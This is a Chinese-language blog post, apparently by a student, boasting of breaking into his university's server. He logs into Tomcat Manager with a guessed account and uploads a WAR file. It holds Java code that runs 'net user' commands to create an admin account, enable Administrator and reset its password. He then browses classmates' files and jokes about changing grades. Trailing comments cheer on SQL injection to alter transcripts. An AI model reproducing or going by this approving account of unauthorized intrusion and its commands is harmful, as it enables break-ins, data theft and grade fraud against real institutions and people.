这是一次神奇的”入侵“,从没学过网络攻防的我最后竟然进入了我们软件学院服务器……
偶然在软件学院网站侧边上看到了一个死链接 404错误 从端口8080应该是Tomcat搭建的, 之前配置过无数次Tomcat,还是比较熟悉的,随便试了个帐号登录Tomcat Manager结果….成功了!!!!
这个管理平台我并没有用过,并不知道能干什么,不过发现可以start和stop服务器上的网站,看下面竟然还可以上传war文件,war文件应该是J2EE工程的生成文件,我试着随便上传了个war,竟然可以正常运行!
这样就可以通过一个Action调用特定的Java方法,从而得知主机所有信息.(心潮澎湃,百感交集 )
如InetAddress.getHostName(),可以得到主机名,类似的可以得到IP,MAC地址等信息,当然,这些并没有什么用.
我是想得到用户名及密码,想到Windows密码虽然保存在本地,但肯定经过不可逆的加密,无法得知,失败.
本来我是想通过Java执行一个配置好的exe,从而达到远程控制,不过这些软件都不怎么好用,灰鸽子好久没接触了,不知道这软件现在怎么样.
后来想起可以通过命令提示符创建帐号,更改密码,什么都可以,这样不就什么目的都达到了?!
过程如下
新建一个Action 配置方法可以见先前的SSH实现登录, execute()方法如下:
//String commandText = “net user adminyilee yilee /add”;
//String commandText2 = “net localgroup administrators adminyilee /add”;
String commandText3 = “net user administrator /active:yes”;//开启administrator账户
String commandText4 = “net user administrator password”;//更改administrator密码
try {
Runtime.getRuntime().exec(commandText3);
Runtime.getRuntime().exec(commandText4);
} catch (IOException e) {
e.printStackTrace();
}
return SUCCESS;
}
代码没什么好解释的,一看便知,生成工程war包,上传,运行上面的Action,OK!!!
远程登录吧,wait!别高兴的太早,你会发现
这是因为服务器默认连接数上限过低
其实到这已经成功了,
普通的方法就是冲进服务器机房,反正你知道Administrator帐号密码,当然我这么聪明不会这么做.
网上解决方法非常多,下个几K工具几行命令就解决了,OK,远程登录,最高权限,想干什么干什么去吧!!!
服务器界面挺干净的嘛…
ftp用server-u搭建,嘿嘿,ftp资源包括不仅限于同学们的作业,随便下,提升自己帐号权限….不敢.rjlab主页保存在website下,有股冲动想加上自己的博客的链接,那多帅!
可惜成绩没保存在这服务器,不然我会对我GPAupdate一下,当然,最终,我什么也没做,我只是个过客罢了.警察叔叔切勿追究!
找到学校教务处的数据库服务器,入侵,SQL注入,改成绩,哈哈哈~~当然,我还不知道怎么弄…
你一定能成功的!到时候帮我也改改~~~哈哈
不得不说……………………膜拜m(_ _)m
低调~~~~~